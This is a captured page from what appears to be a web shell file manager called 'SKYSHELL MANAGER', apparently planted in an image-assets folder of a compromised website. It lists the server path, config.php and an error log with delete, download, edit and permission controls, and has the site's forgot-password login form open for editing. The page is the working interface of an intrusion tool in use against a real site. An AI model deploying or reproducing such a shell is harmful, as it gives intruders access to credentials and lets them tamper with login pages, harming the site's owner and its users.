📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
ads
/
users
/
assets
/
img
/
ads
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
5929.71 KB
0644
🗑️
⬇️
✏️
🔒
Editing: forgot_password.php
<section class="login-block"> <!-- Container-fluid starts --> <div class="container"> <div class="row"> <div class="col-sm-12"> <!-- Authentication card start --> <form class="md-float-material form-material" method="POST" action="<?php echo base_url();?>Login/reset_password"> <div class="auth-box card"> <div class="card-block"> <div class="row m-b-20"> <div class="col-md-12"> <h3 class="text-center">Forgot Password </h3> <?php echo isset($alert)?$alert:NULL;?> </div> </div> <div class="form-group form-primary"> <input type="text" name="email" class="form-control" required="" placeholder="Your Email Address" name="email"> <span class="form-bar"></span> </div> <div class="row m-t-30"> <div class="col-md-12"> <input type="submit" name="login" class="btn btn-primary text-center" value="Reset Password" /> </div> </div> <hr> </div> </div> </form> <!-- end of form --> </div> <!-- end of col-sm-12 --> </div> <!-- end of row --> </div> <!-- end of container-fluid --> </section>
💾 Save Changes